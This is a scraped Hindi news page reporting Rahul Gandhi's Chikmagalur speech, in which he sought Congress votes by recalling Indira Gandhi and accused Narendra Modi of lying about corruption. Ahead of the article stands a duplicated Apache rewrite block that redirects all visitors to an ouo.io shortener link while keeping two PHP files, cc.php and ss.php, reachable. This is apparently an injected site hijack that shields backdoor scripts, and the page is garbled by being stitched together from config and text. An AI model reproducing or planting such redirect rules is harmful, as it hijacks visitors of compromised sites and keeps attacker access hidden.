
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 630
Previous Nextचिकमंगलूर। कर्नाटक दौरे पर गए राहुल गांधी ने कल यहां पर अपनी दादी इंदिरा गांधी के नाम आगामी विधानसभा चुनाव में कांग्रेस के लिए वोट मांगे। इसके साथ ही उन्होंने प्रधानमंत्री पर झूठ बोलने का आरोप भी लगाया। कहवा उत्पादन केे लिए चर्चित एक जिले में जनसभा को संबोधित करते हुए उन्होंने कहा ‘‘आपने मेरी दादी को बुरे दौर (1977-79) में साथ दिया और यहां 1978 में हुए लोकसभा चुनाव में उन्हें जीत दिलाई।’’ पार्टी कार्यकर्ताओं की एकजुटता और कड़ी मेहनत के बूते उन्होंने आगामी विधानसभा चुनाव में सत्ताधारी पार्टी की जीत का भरोसा जताया और लोगों से उनका आशीर्वाद मांगा और कहा कि उन्हें उसी तरह उनकी मदद की अपेक्षा है जिस तरह उन्होंने उनकी दादी को समर्थन दिया था। प्रधानमंत्री नरेंद्र मोदी पर झूठ बोलने का आरोप लगाते हुए उन्होंने कहा कि मोदी भ्रष्टाचार की बात करते हैं जबकि वह खुद भ्रष्टाचार के आरोपों में जेल गए पार्टी के सदस्यों के साथ मंच साझा करते हैं।
उन्होंने कहा, ‘‘मोदी को भारतीय जनता पार्टी (भाजपा) के अध्यक्ष अमित शाह के पुत्र जय शाह की कंपनी के कारोबार में अचानक तरक्की में भ्रष्टाचार नहीं दिखता है।’’ राहुल ने यहां पर करीब 30 मिनट तक हिंदी में भाषण दिया। इस दौरान उन्होंने भाजपा के प्रदेशाध्यक्ष बीएस येदियुरप्पा और हीरा कारोबारी नीरव मोदी तक का जिक्र किया।